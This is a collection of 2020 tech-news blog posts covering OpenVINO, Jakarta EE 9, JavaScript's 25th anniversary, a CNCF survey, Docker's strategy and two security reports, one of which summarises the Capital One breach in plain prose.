Intel Distro of OpenVINO Helps Devs with Inferencing Beyond Computer Vision

Developers continue to adapt to the advent in nearly everything of Artificial Intelligence (AI), or more precisely, machine learning (ML) and deep learning (DL). And the tools are evolving with them and this growing demand.

One example is the OpenVINO toolkit. OpenVINO stands for Open Visual Inference and Neural Network Optimization. It's a toolkit developed and open sourced by Intel to facilitate faster inferencing in deep learning models on Intel hardware. It's based on convolutional neural networks (CNN), a deep learning algorithm designed for working with two-dimensional image data, although it can also be used with one-dimensional and three-dimensional data. The open-source version is licensed under and Apache License v2.

I talked with Bill Pearson, VP of Intel's IoT group, about his company's distro of OpenVINO.

"I suppose the key thing this tool does is to simplify the process of helping developers with their high performance inferencing needs," Pearson told me. "We're seeing a number of different use cases and requirements for doing inference--which silicon do I need, and what programming models on top of it. This can be quite confusing, so with OpenVINO, we created an API-based programming model that allows you to write once and deploy anywhere. What that means practically is, we take all the complexity of writing for FPGA, GPU, CPU, or whatever. We hide that complexity, so the developers have a consistent interface that lets them literally write once and then deploy to any of those different architecture types, depending on their needs and their requirements."

The first set of use cases Intel focused on were all computer vision related, Pearson said, because that's where most developers needed with inferencing. But with the most recent release of the toolkit, Intel is looking at inference beyond computer vision.

OpenVINO 2021.1, announced in October, is designed to enable end-to-end capabilities that leverage the toolkit for workloads beyond computer vision. These capabilities include audio, speech, language, and recommendation with new pretrained models; support for public models, code samples, and demos; and support for non-vision workloads in the DL Streamer component.

This release also introduces official support for models trained in the TensorFlow 2.2.x framework; support for 11th generation Intel Core processors (formerly code named Tiger Lake); and new inference performance enhancements with Intel Iris Xe graphics, Intel Deep Learning Boost (Intel DL Boost) instructions, and Intel Gaussian & Neural Accelerator 2.0 for low-power speech processing acceleration.

It comes with the OpenVINO model server, which is an add-on to the Intel distro, and a scalable microservice. "This add-on provides a gRPC or HTTP/REST endpoint for inference, making it easier to deploy models in cloud or edge server environments," the company said in a statement. Also, it's now implemented in C++, which enables reduced container footprint (for example, less than 500 MB), and delivers higher throughput and lower latency.

There's also a beta release due this quarter that integrates the Deep Learning Workbench with the Intel DevCloud for the Edge. The result: developers can now graphically analyze models using the Deep Learning Workbench on Intel DevCloud for the Edge, instead of being stuck on a local machine only, to compare, visualize, and fine-tune a solution against multiple remote hardware configurations. And there's another add-on: the OpenVINO model server, which provides a gRPC or HTTP/REST endpoint for inference, making it easier to deploy models in cloud or edge server environments. It's now implemented in C++, to enable reduced container footprint (for example, less than 500 MB), and deliver higher throughput and lower latency.

"We have to deliver features, of course, but we also need to deliver on performance," Pearson said. "With this release, that's what we've done. Applying CNN is helping us to take advantage of modern AI, to be able to get models that do a much better job at delivering what we'd expect from inference, and to be able to detect that defect or notice that object."

Pearson offered a customer example: "There are some great you know customer examples where we've seen this be the true. The earliest things we've seen are in finding manufacturing defects. There's an aluminum engine provider, who was doing inspections the old way--by hand. They had to wait for these objects to cool so that a person could turn it and look at it. You can imagine that doing that with a computer and a camera is going to be much more accurate and much quicker. And we've just seen this expand way beyond that to use cases in health care for medical screenings, and things like sewer pipe inspections--which basic, but essential--and in businesses like retail, where we're going through these frictionless checkout systems and trying to be able to see what objects are going through the scanner and track tell what what's being processed"

Intel OpenVINO is available today on its DevCloud.

Posted by John K. Waters on December 15, 20200 comments


Jakarta EE 9 Released

The Eclipse Foundation's Jakarta EE Working Group today announced the release of the Jakarta EE 9 Platform, Web Profile specifications, and related TCKs. The Foundation made the announcement during its JakartaOne Livestream event, currently underway online.

This is the release that moves enterprise Java fully from the javax.* namespace to the jakarta.* namespace. It "provides a new baseline for the evolution and innovation of enterprise Java technologies under an open, vendor-neutral, community-driven process," the Foundation said in a statement. The fact that it doesn't do much more than that is the key virtue of this release, says the Foundation's executive director, Mike Milinkovich.

"It's important to understand that announcing a release in which the only thing we did was change the namespace was very much by design," Milinkovich told me. "When you're taking about a 20-year-old, multibillion-dollar ecosystem, and moving it forward, it's really important that you do it in a way that makes it as easy as possible for the ecosystem to come along with you."

The Foundation's Jakarta Working Group was established in March 2018, so they've been at this for a while. And the group has faced a few headwinds along the way--perhaps most notably Oracle's refusal to give up the javax.* namespace. The plan for a complete change-over from javax.* to the jakarta.* was, of course, controversial. The move even had a nickname: "The Big Bang."

"To be fair to Oracle, it's a two-decades-old platform they acquired from Sun Microsystems that had lots of legal constraints on it," Milinkovich said, "agreements that go back many decades. At the end of the day, I don't think there was any ill will or anything like that [from Oracle], and I even have to acknowledge that the engineering teams that we worked with from Oracle--who have made all this possible--were fantastic. It's unfortunate that we weren't able to just carry the javax.* namespace forward, because that would have been easier for everybody. But it just turned out to be an unsolvable set of constraints."

This namespace change firmly establishes Jakarta EE 9 as a foundation on which cloud-era innovations can be built for future Java infrastructure, the Foundation says. Also, Jakarta EE 9 enables enterprise end users and enterprise software vendors to migrate from older, previous versions to newer cloud-native tools, products, and platforms.

"Just changing the namespace is going to have a big impact," he said. "It allows the vendors who sell application servers--like WebLogic, WebSphere, JBoss, Open Liberty, Payara, etc.--the tooling ecosystem--IntelliJ, JetBrains, Apache NetBeans, our own Eclipse IDE--and the other Java runtimes--Spring Boot, Micronaut, Orcas, and the like--to migrate forward with the least possible disruption. We are now free to innovate in our own namespace."

Approximately 90 percent of the Fortune 500 are running enterprise Java apps in production, the Foundation has said, and the Jakarta EE 9 specifications "give new life to this massive installed base."

The enterprise Java ecosystem is generating more interest from vendors than it has in years, Milinkovich said, which is something of a validation of the Foundation's approach.

"On the vendor side, it had been whittled down to IBM, Red Hat, Payara, Tomitribe, and Fujitsu," he said. "But now, we're getting a lot more vendor engagement, participation, and  support. All good things."

With this release the Eclipse Foundation is also announcing the certification of Eclipse GlassFish 6.0.0, as well as several solutions working on compliance for 2021, including:

● Apusic AAS
● Fujitsu Software Enterprise Platform
● IBM Websphere Liberty
● Jboss Enterprise Application Platform
● Open Liberty
● Payara Platform
● Piranha Micro
● Primeton AppServer
● TMax Jeus
● WildFly

It's worth keeping in mind that specification approval was fresh territory for the Eclipse Foundation, and it had to put together a brand new specification process. Jakarta EE is being developed and maintained under the Jakarta EE Specification Process, which replaces the Java Community Process (JCP) for Java EE.

Accepting the stewardship of enterprise Java and shepherding its successful journey to Jakarta EE is a real feather in the Foundation's cap, Milinkovich said.

"I think a lot of other organizations might have given up along the way," he said, "but the persistence, experience, and intellectual property sophistication we have at the Foundation led us to find a path that got us to where we are."

The Jakarta EE roadmap for 2021 includes at least one more (huge) baby step in Jakarta 9.1: the move of the base platform from Java SE 8 to Java SE 11. Efforts are already under way for that release, though Milinkovich didn't offer a release date.

"I don't know when it's coming, but we're turning the crank as fast as possible," he said.

Moving the base Java platform from Java SE 8 to Java SE 11 is a logical next step in this process. Java eight is still the most widely used version of Java, and Java 11 is next in popularity.

"By moving this Java platform forward we're helping to modernize the Java ecosystem," Milinkovich said.

Posted by John K. Waters on December 8, 20200 comments


JavaScript Turns 25: Pluralsight Gurus Weigh In

On Friday, December 4, JavaScript turns 25. The venerable client-side scripting language had a wobbly start when Mozilla co-founder Brendan Eich unveiled it in 1995, but today it runs on every Web browser, cell phone, Internet-enabled TV, and smart dishwasher.

When Java turned 25 in May of this year, online course provider Pluralsight shared the insights of its Java course authors on the impact of that juggernaut of a programming language and platform with ADTmag readers. The technology workforce development company turned to its popular JavaScript course authors on the occasion of the senior scripter's silver anniversary "to reflect on its impact and continued influence on the world, as well as their own personal journey with the programming language."

In addition to the wisdom of its teachers, Pluralsight is offering free access to 25 of its most popular JavaScript courses throughout December (five free courses a week). Also, check out the relaunched JavaScript.com, which includes new resources "designed to help JavaScript developers of all abilities."

How important is JavaScript today compared to when it first launched?

Cory House, @housecor: When JavaScript first launched, it was unclear if it would take off. It was written in a few days, and initially only offered in a single browser. Microsoft's first browser shipped with their own flavor of JavaScript, called JScript. Today, JavaScript makes the world go 'round. It runs on every computer. Every phone. TVs. Even some appliances. A huge portion of humanity relies on JavaScript every day without realizing it.

Jonathan Mills, @jonathanfmills: When JavaScript first launched, it was just there to help a webpage be interactive. JS is no longer contained to the browser. Now JavaScript has grown into a massive ecosystem that has impact in every area of software development. As a JS developer, I can write applications on the backend, frontend, mobile device, and IoT devices.

Nate Taylor, @taylonr: The easy answer is to talk about how JavaScript is used today across the entire spectrum of software development. From web applications, mobile applications, servers and even as stored functions in databases. And while that's true, I think it neglects the importance of JavaScript when it first launched. Prior to JavaScript's introduction, the web was not much more than static hypertext delivered in a browser. Without JavaScript, we likely don't have the web that we do today, but we didn't necessarily understand that when it was first released.

What makes JavaScript such a timeless programming language?

House: JavaScript is timeless because it's approachable, multiparadigm, and ubiquitous. There are multiple ways to accomplish a given task. You can code in an object-oriented or functional style. And since JavaScript has a C-like syntax, it feels familiar to people who have worked in other C-like languages. JavaScript remains "timeless" by continually embracing good ideas from other languages.

Mills: Honestly, I think it's a combination of simplicity and flexibility. The learning curve of JavaScript is much lower than the typical enterprise languages of C# and Java, so it is easy to pick up. But its flexibility in running everywhere and its very lightweight nature make it easy to get things done everywhere. The combination of those two things make JavaScript an easy tool to reach for given any job.

Taylor: I think the number one thing is the community. It's driven by countless engineers who are constantly exploring and trying out new things. Because of the community, we now have NodeJS, so that we can run JavaScript on the server. We have libraries like RamdaJS, which brings in concepts from functional programming languages and makes them accessible to JavaScript developers. We even have TypeScript as a super-set of JavaScript. And through all of that, the language has grown and adapted. In some ways, the fluidity of the language that causes so many of us problems when we first learn it, is part of what keeps it going even today.

What would the web or e-commerce look like if we didn't have JavaScript?

House: Without JavaScript, the web would be similar to the late 90's. Simpler and lighter-weight, but also less feature-rich. We'd have to post back to the server on every request, leading to a clunkier user experience.

Mills: While it's almost impossible to say what it would look like without JavaScript, I will say it would be fundamentally different.

Taylor: It would be slower and more frustrating. Imagine signing up for a service. The only way to know if your username was available would be to submit the entire form to the server and have it tell you if that was available. If the name was taken, you'd have to fill out the entire form again and resubmit. Eventually you would either find a unique name, or you'd give up. But with JavaScript, we're able to do this behind the scenes. While you're filling out the form--sometimes while you're typing the username--you can receive instant feedback if that name is available.

Additional problems would exist for e-commerce, as well. A common situation today is to see something in your cart and decide to change the quantity, or possibly even save it for later in a wish list. Those are relatively straightforward JavaScript calls. Without that, you would again be forced to resubmit the entire form until you were ready to proceed.

When did you first learn JavaScript? What impact has it had on you personally?

House: I learned JavaScript in the late 90s. It was awful. The debugging experience was horrendous. I often couldn't tell clearly what had failed. It ran significantly differently on Internet Explorer than Netscape. It was so painful early on that I embraced Flash and expected it to overtake HTML and JavaScript in popularity. Clearly, I was wrong! As JavaScript matured, so did related libraries and browsers. Today, coding in JavaScript is a wonderful, rapid feedback experience.

Mills: For the vast majority of my career I have been a backend developer in the .NET and Java space. But as the ecosystems grew and the sheer weight of projects increased, I found myself looking for alternatives that would let me solve business problems faster. I made the transition to node and AngularJS a while ago and have never looked back. The speed and reliability of the tooling is something I really enjoy.

Taylor: Sometime around 2009 was when I first started learning JavaScript. I didn't care for it, because I liked working on thick client applications in C#. That said, I did see its usefulness, particularly on one-side project[s], where I was able to use jQuery for a grid that was displaying data. Experimenting with that bit of JavaScript helped open several doors for me. It allowed me to interview for a web developer position that ended up changing the course of my career.

In addition to helping me land jobs for my 9-to-5 work, JavaScript also indirectly led me to more teaching as I advanced in my career. I found that JavaScript offered different ways of solving problems than I was used to. And in explaining those ideas to other developers I realized that I enjoyed helping others learn and grow. It was exciting to see developers grasp new ideas.

What does the future look like for JavaScript? What's coming next year, 2-3 years from now, etc.?

House: For around 10 years, JavaScript didn't change at all. Thankfully, today new JavaScript releases occur every June. In the short term, I expect to continue to see mostly minor enhancements that implement good ideas from competing languages. Longer-term, I expect to see JavaScript decreasingly used as a compile target. People will increasingly use languages that compile to JavaScript. Today, TypeScript is popular example, but we may see other more popular, higher-level alternatives in the future. And while Web Assembly is likely to grow increasingly popular in the coming years, it will continue to interface with JavaScript to get things done.

Mills: One of the primary complaints I have heard about JavaScript is that the massive open-source ecosystem is so hard to navigate and new frameworks pop up every day. I find that is less the case now than it was a year ago, and that trend will continue. I find most developers are using one of frameworks on the frontend (React and Vue), and almost everyone I know is using Express on the backend, and I see that trend continuing. Improvements will be made and features added, but for the most part, I think the ecosystem has solidified to a point that you can reliably pick up a tool and know that it will be around for a while.

Taylor: I think we've finally moved past the phase of JavaScript where everyone was making jokes about how fast a new library came out, and now we're to the point where we're trying to use it to provide real value to our users and clients. As a result, I think we'll continue to see JavaScript maturing. It will continue to get new features that help ease development in JavaScript. We'll continue to see more and more uses in areas that we don't immediately expect. It wasn't that long ago that it was not possible to write a mobile app in either Java or Swift, but now with frameworks like ReactNative, it's possible to use the same JavaScript skills that developers already have to create mobile apps.

Posted by John K. Waters on December 1, 20200 comments


CNCF Survey 'Takes the Pulse' of the Global Cloud Native Community

This week's KubeCon + Cloud Native online event, wrapping up today, dominated our headlines this week, and for good reason. The flagship conference of the Cloud Native Computing Foundation (CNCF) was chock-a-block with vendor announcements and Kubernetes community news.

Among the noteworthy news from the CNCF itself was the publication of the results of its 2020 survey. Based on the responses of 1,324 members of the global cloud native community, the survey "takes the pulse" of that community to provide some clarity on where and how cloud native technologies are begin adopted.

My list of key takeways from this survey includes:

  • The use of containers in production has increased to 92%, up from 84% last year, and up 300% from our first survey in 2016.
  • Kubernetes use in production has increased to 83%, up from 78% last year.
  • There has been a 50% increase in the use of all CNCF projects since last year's survey.
  • Usage of cloud native tools:
    • 82% of respondents use CI/CD pipelines in production.
    • 30% of respondents use serverless technologies in production.
    • 27% of respondents use a service mesh in production, a 50% increase over last year.
    • 55% of respondents use stateful applications in containers in production.

Public cloud continued to be the most popular data center approach in this year's survey (that's three years in a row). It increased slightly in usage from last year (64%, up from 62%). Private cloud or on-prem usage had the most significant increase (52%, up from 45%). Hybrid decreased slightly (36% down from 38% in 2019). Multi-cloud usage, a new survey option this year, accounted for 26%.

"For the purpose of this analysis, hybrid cloud refers to the use of a combination of on-premises and public cloud," the report explains. "Multi-cloud means using workloads across different clouds based on the type of cloud that fits the workload best. The portability that Kubernetes and cloud native tools provide makes it much simpler to switch from one public cloud vendor to another. The addition of multi-cloud as an option this year does not necessarily explain the drop in hybrid unless respondents use a different definition."

The survey compiled responses from the community gathered between May and June 2020. Of those responding, 54% indicated their organization is part of the CNCF End User Community, which comprises more than 140 companies and startups "committed to accelerating cloud native technologies and improving the deployment experience." Many of the respondence were based in Europe and North America, but it was a worldwide survey: 38% were from Europe; 33% from North America; 23% from Asia; and 6% from South and Central America, Africa, Australia, and Oceania. Two-thirds of respondents were from organizations with more than 100 employees, and 30% were from organizations with more than 5,000 employees, showing a strong enterprise representation.

This is a thoughtful survey with more stats on release cycles, normalized use of containers, Kubernetes environments, "container challenges," and more.

Posted by John K. Waters on November 19, 20200 comments


Java and Python Top List of Languages People Most Want to Teach Themselves

Here's a report for the times: Specops Software sifted data from Ahrefs.com using its Google and YouTube search analytics tool to surface a list of the programming languages people most want to teach themselves. Python and Java topped that list of most "self-mastered" coding languages, not surprisingly. And YouTube was the primary tutor.

Specops found the most commonly searched for programming languages on Google and YouTube within the last month, and then, using Ahrefs.com, teased out the 13 languages with the most global searches, relying on phrases like "Learn Python" and "Learn Java." That search was further refined and the results merged the results to find the most searched for language overall around the world.

The researchers then investigated search volumes in the United States, United Kingdom, Canada, and Australia, to see which programming language these countries have been searching for the most on Google and YouTube.

Python had the most global searches on Google (182,000 monthly searches) and YouTube ( 53,000 monthly searches) for a combined volume of  235,000 each month.

"On a global scale, Python is the most searched for programming language to learn," the report states…. As one of the most versatile coding languages today, it should come as no surprise that this is one of the most popular programming languages for those wanting to learn how to code – particularly beginners. What's more, our recent study found that it is one of the most sought-after programming languages by employers around the world too."

Coming in second was Java, with 64,000 Google searches and 20,000 YouTube searches, for a total volume of 84,000 monthly. "Learn Java" was the second most popular keyword search for those wanting to learn how to code," the report states.

SQL, PHP, and R placed fourth, fifth and sixth, respectively, with the combined Google and YouTube searches reaching 45,000, 31,400, and 14,000.

C++ came in third, with 56,000 total searches per month. The least in-demand programming language in this report was Rust, with only 2,150 total searches monthly. Next to last on the list was JavaScript, with only 1,900 searches

The US ranks the highest among the UK, Canada, and Australia, for the highest volumes of collective searches across the 13 languages, which totaled 182,150.

"As the employment market becomes more competitive, self-taught skills and experience have become increasingly valuable across the globe, and programming languages are no exception," the report states.

Posted by John K. Waters on November 12, 20200 comments


Jonas Bonér and the Reactive Manifesto II

It's been about seven years since Jonas Bonér, co-founder and CTO of Lightbend and creator of the Akka project, first published "The Reactive Manifesto" with contributions from Dave Farley, Roland Kuhn, and Martin Thompson. He and his colleagues used that document to provide an accessible and succinct definition of reactive systems--software developed using message-driven and event-driven approaches to achieve the resiliency, scalability, and responsiveness required for cloud-native applications.

"We needed a way to explain what we we're talking about that wasn't full of geeky buzzwords and ended up just being confusing," Bonér told me at the time. "The manifesto distills things down to the essence of these new applications, which are being built right now, and provided a vocabulary that would allow developers to talk about these things."

This week, under the auspices of the Linux Foundation and the newly formed Reactive Foundation, Bonér and a veritable crowd of collaborators published an updated and expanded version of that document, entitled "The Reactive Principle." The press announcement characterized the new manifesto as a complement to the original that "incorporates the ideas, techniques, and patterns from both Reactive Programming and Reactive Systems into a set of practical principles, to apply Reactive to cloud native applications to realize the efficiencies of building for and running on the cloud."

"One of the problems with reactive is that it has been a little bit diluted over the years," Bonér explained during a recent Zoom interview. "People slapped 'reactive' on almost anything. Some things are actually reactive and some are variations. And some things called reactive aren't really living up to what we think it is. And that's why I felt it was important to get together with a lot of people, not just me, to define what reactive means and sort of breathe some new life into it."

The new document is the product of a collaboration among leading minds in the Reactive and broader distributed computing communities. Along with Bonér, the list of collaborators includes Roland Kuhn, Ben Christensen, Sergey Bykov, Clement Escoffier, Peter Vlugter, Josh Long, Ben Hindman, Vaughn Vernon, James Roper, Michael Behrendt, Kresten Thorup, Colin Breck, Allard Buijze, Derek Collison, Viktor Klang, Ben Hale, Steve Gury, Tyler Jewell, Ryland Degnan, James Ward, and Stephan Ewen

The original manifesto was intentionally short and designed to be easily digestible ("Even CIOs read it," Bonér said.) The new "Principles" document is as rich as the original was lean. Among other things, it lays out the eight principles an application must embrace in its design, its architecture, and even its programming model to be considered Reactive:

  • Stay Responsive -- always respond in a timely manner
  • Accept Uncertainty -- build reliability despite unreliable foundations
  • Embrace Failure -- expect things to go wrong and build for resilience
  • Assert Autonomy -- design components that act independently and interact collaboratively
  • Tailor Consistency -- individualize consistency per component to balance availability and performance
  • Decouple Time -- process asynchronously to avoid coordination and waiting
  • Decouple Space -- create flexibility by embracing the network
  • Handle Dynamics -- continuously adapt to varying demand and resources

"The Reactive Principles" also offers sets of design principles for cloud-native and edge-native applications, as well as patterns that can help codify and apply the Reactive Principles to applications and systems.

The Reactive Foundation, launched last year with founding members Alibaba Cloud, Facebook, Lightbend, VMWare, and VLINGO, is a non-profit organization established to provide a formal open governance model and neutral ecosystem for creating open-source Reactive projects. The group is a top-level project within the Linux Foundation that it is "dedicated to being a catalyst for advancing a new landscape of technologies, standards, and vendors."

Bonér was set to unveil "The Reactive Principles" today during his keynote presentation at the Reactive Summit 2020 virtual event.

"The cloud needs a programming model that brings the same reliability, predictability, and scalability at the application layer that Kubernetes has brought to the infrastructure layer," Bonér said in a statement.

You can find an early edition of "The Reactive Manifesto" online. At least you could as of this writing. It's worth a look before digging into the new document, which, though much longer, is just as accessible.

The Reactive Foundation also announced that two open-source projects, R2DBC and Reactive Streams, have joined the foundation, and that a newly formed Technical Oversight Committee is evaluating additional open-source project candidates. The R2DBC project brings Reactive programming APIs to relational databases in an effort to provide a better alternative to JDBC and the "blocking" issues it creates for SQL databases in Reactive Systems. Reactive Streams is an initiative to provide a standard for asynchronous stream processing with non-blocking back pressure, encompassing runtime environments (JVM and JavaScript) as well as network protocols.

The first project of the foundation, RSocket, is an implementation of Reactive Streams that provides a message-driven binary protocol for use on byte stream transports ,such as TCP and WebSockets.

 

Posted by John K. Waters on November 10, 20200 comments


'Nature vs. Nurture' in Application Security Testing

It'll surprise no one in the software-making business to hear an app security vendor claim that the majority of applications contain at least one security flaw. (Really? Only one?) But a new report from Application Security Testing (AST) solutions provider Veracode serves as a cogent reminder that it often takes months to fix those flaws.

The report, "State of Software Security," available as a free download, analyzes 130,000 applications. The report's authors determined that it takes about six months for teams to close half the security flaws they find. The report also outlines some best practices to significantly improve those deplorable fix rates.

Veracode's researchers found that there are some factors that teams tend to have a lot of control over, and those over which they often have very little control. The report's authors went with "nature vs. nurture" categories for these factors. Within the "nature" category, Veracode considered factors such as the size of the application and the organization, as well as security debt; the "nurture" side accounts for such actions as scanning frequency, cadence, and scanning via APIs.

Again, not surprisingly, addressing issues with modern DevSecOps practices results in higher flaw remediation rates, they found. Some examples: Using multiple application security scan types, working within smaller or more modern apps, and embedding security testing into the pipeline via an API. They all make a difference in reducing time to fix security defects, the report's authors found, even in apps with a less than ideal "nature." 

"The goal of software security isn't to write applications perfectly the first time, but to find and fix the flaws in a comprehensive and timely manner," said Chris Eng, Chief Research Officer at Veracode, in a statement. "Even when faced with the most challenging environments, developers can take specific actions to improve the overall security of the application with the right training and tools."

This is Veracode's 11th annual report on secure application development. A partial list of some other key findings includes:

  • Flawed applications are the norm: 76% of applications have at least one security flaw, but only 24% have high-severity flaws. This is a good sign that most applications do not have critical issues that pose serious risks to the application. Frequent scanning can reduce the time it takes to close half of observed findings by more than three weeks.
  • Open source flaws on the rise: while 70% of applications inherit at least one security flaw from their open source libraries, SOSS 11 also found that 30% of applications have more flaws in their open source libraries than in the code written in-house. The key lesson is that software security comes from getting the whole picture, which includes identifying and tracking the third-party code used in applications.
  • Multiple scan types prove efficacy of DevSecOps: teams using a combination of scan types including static analysis (SAST), dynamic analysis (DAST), and software composition analysis (SCA) improve fix rates. Those using SAST and DAST together fix half of flaws 24 days faster.
  • Automation matters: those who automate security testing in the SDLC address half of the flaws 17.5 days faster than those that scan in a less automated fashion.
  • Paying down security debt is critical: the link between frequently scanning applications and faster remediation times has been established in Veracode's prior State of Software Security research. This year's report also found that reducing security debt – fixing the backlog of known flaws – lowers overall risk. SOSS 11 found that older applications with high flaw density experience much slower remediation times, adding an average of 63 days to close half of flaws.

Veracode's native SaaS solution is designed to enable companies to move AppSec to the cloud securely, and it supports cloud-native applications "while empowering developers to fix, not just find, flaws," the company says. Veracode has helped customers fix more than 10.5 million security defects in their software via analysis of more than 7.8 trillion lines of code between Jan. 1, 2020, and Oct. 5, 2020, the company says.

Posted by John K. Waters on November 5, 20200 comments


CSA Dives Deep Into 'Egregious' Cloud Computing Threats

The Cloud Security Alliance (CSA) published a report in late September that I just got around to reading. I guess it was the Halloween season that drew me to the title, "Top Threats to Cloud Computing: Egregious 11 Deep Dive." It provides case‌ ‌study‌ ‌analyses‌ of last year's ‌The‌ ‌Egregious‌ ‌11:‌ ‌Top‌ ‌Threats‌ ‌to‌ ‌Cloud‌ ‌Computing, with nine recent cybersecurity attacks and breaches. (Both reports featured a scary octopus on their covers.)

All kidding aside, the deep dive is well worth a look, and its free. The so-called Egregious 11, you'll recall, were culled from a survey of 241 industry experts on security issues in the cloud. The respondents rated 11 "salient threats, risks, and vulnerabilities" in their cloud environments. The Top Threats Working Group used the survey results, along with its own expertise, to create the final 2019 report.

The new report looks at nine actual attacks and breaches, including "a major financial services company, a leading enterprise video communications firm, and a multinational grocery chain," for its foundation. The report "connects the dots between the CSA Top Threats in terms of security analysis," Jon-Michael C. Brook, chair of the Top Threats Working Group, wrote in a forward to the report. And I think it does so quite effectively.

The list of organizations whose breaches were analyzed is a sexy one. It includes Capital One, Disney+, Dow Jones, GitHub, Imperva, Ring, Tesco, Tesla, and Zoom.

Each of the nine examples is presented in the form of a reference chart and a detailed narrative. The reference chart's format provides an attack-style synopsis of the actor spanning from threats and vulnerabilities to end controls and mitigations.

Here's one example of the narrative portion of the Capital One breach analysis:

Actor: Former engineer of AWS with insider knowledge on platform vulnerabilities gained credentials from a misconfigured web application to extract sensitive information from protected cloud folders.

Attack: Open-source anonymity network (Tor) and VPN services (iPredator) hides attacker. Misconfigured ModSecurity WAF used by Capital One with their AWS cloud operations relayed AWS cloud metadata services including credentials to cloud instances. Over privileged access given to the WAF allowed the attacker to gain access to protected cloud storage (AWS S3 buckets) with the ability to read data sync and exfiltrate sensitive information.
Vulnerabilities: A Server Side Request Forgery (SSRF) vulnerability on the platform was exposed in which a server (e.g. Capital One's WAF) was tricked into requests from an attacker to access cloud server configurations (e.g. EC2 metadata service) including credentials to whatever the server had access to.

Data Breach: A web application was compromised for IAM credentials to access multiple cloud folders. The cloud folders accessed had read rights to 106 million records of customer information that were exfiltrated.

Data Loss: The data extracted were credit card applications and credit card customer status reports between 2005-2019. Personal Identified Information (PII) from the applications included applicant names, addresses, zip codes/postal codes, phone numbers, email addresses, dates of birth, and self-reported income. The credit card customer PII and financial records extracted included credit scores, credit limits, balances, payment history, contact information, social security numbers, and linked bank accounts. Approximately 140,000 Social Security numbers and 80,000 linked bank account numbers of secured credit card customers were exfiltrated.

I think these narratives read like mystery/thrillers, and the companies are name brands for the most part. Even if you're not into this kind of thing, this is an accessible report with useful insights that you should definitely read, developers and IT pros alike.

Both reports were prepared by the CSA's Top Threats Working Group, which, the CSA says, aims to provide organizations with "an up-to-date, expert-informed understanding of cloud security risks, threats, and vulnerabilities in order to make educated risk-management decisions regarding cloud adoption strategies."

When the CSA first hit my radar in 2012, it described itself as a not-for-profit coalition of companies, individuals, organizations, and "key stake holders" with an interest in promoting secure cloud computing. It's mission hasn't changed, and the website features a nice history and list of milestones. The group also issues the Certificate of Cloud Auditing Knowledge (CCAK) certification, currently the only credential for industry professionals who demonstrate expertise in the essential principles of auditing cloud computing systems. The CSA developed the most widely adopted cloud security audit criteria and organizational certification, which makes the group uniquely positioned to lead industry efforts to make sure that industry professionals have the requisite skill set for auditing the cloud environment.

 

Posted by John K. Waters on November 2, 20200 comments


Docker Inc.'s Strategic Shift to Dev Focus One Year Later

It's been almost exactly one year since Docker Inc. sold its enterprise platform business to Mirantis, a commercial distributor of OpenStack, to focus on the needs of enterprise application development teams. Since then, the company behind the leading containerization platform has concentrated on refining its dev tools and building an ecosystem of partners to support a "code-to-cloud" automations for developers.

Docker CEO Scott Johnston talked with a group of reporters this week about the progress of that strategy and laid out the company's path going forward.

The sale to Mirantis was a burn-the-ships commitment to a massive restructuring of the company. "We sold off three quarters of our employee base, all the enterprise customers, and all the enterprise customer revenue," Johnston said. "All in the spirit of restarting the company with a new mission."

That new mission would see Docker spending the next year with a "laser-like focus" on app development teams, embracing partners "in a first-class-citizen type way," and "building a sustainable community, sustainable code, and a sustainable company around the restructured entity."

The result? 11.3 million monthly active users sharing applications from 7.9 million images on Docker Hub repositories with 13.6 billion code pulls per month--up 70% over last year, Johnston said.

Johnston emphasized Docker's commitment to embracing a community to provide for the needs of enterprise developers. "We walk the talk," he said, citing the open sourcing of the Compose Specification in April on GitHub with open governance. Compose is a developer-focused standard for defining cloud and platform agnostic container-based applications.

He pointed to some key partnerships, including a deal with Microsoft that integrates the Azure public cloud and the Virtual Studio Code editor with Docker Desktop. The company also recently announced a partnership with open-source security platform provider Snyk to deliver a native vulnerability scanning service for container images. And he pointed to the recent agreement with Amazon Web services (AWS) to create a simplified workflow for developers using Docker Compose to build apps for Amazon's Elastic Container Service (ECS) and Amazon ECS on AWS Fargate. Docker has also partnered with Atlassian and the Microsoft-owned GitHub to make Docker Hub something of a nexus for integrating, configuring, and managing application components.

Former industry analyst Donnie Berkholz, who joined the company as VP of product just a few weeks again, was on hand for the briefing. All of these integrations are about helping developers get from code to cloud quickly, he said. "And that's not just about things we deliver, but these partnerships," he said. "Because developers are building, sharing, and deploying all over the internet. We can't just have a single point solution to solve their problems. We have to meet developers where they are and where they're going. And so really the partnership ecosystem that we're forming around Docker is the core to doing that."

Johnston also addressed some pricing changes that went into effect over the past year. The company added per-seat pricing for subscriptions, and then followed up with an annual purchasing option that offers discounts for longer-term commitments. The company's free plan, which gave developers unlimited public repositories and one private repository, proved not to be economically sustainable "when we have tens of millions of developers today and tens of millions more coming tomorrow," Johnston said. The adjustments are intended to make sure a small subset of "overconsuming" users doesn't negatively impact the rest of the users.

"In order to build a sustainable community and sustainable code, we have to build a sustainable company around the new restructured entity," he said. "So we put limits on the upper bounds of the all-you-can-eat buffet, so we're able to scale to tens of millions more developers and continue to offer free services, while still having a viable business that can sustain all the investments required in order to do that."

Posted by John K. Waters on October 29, 20200 comments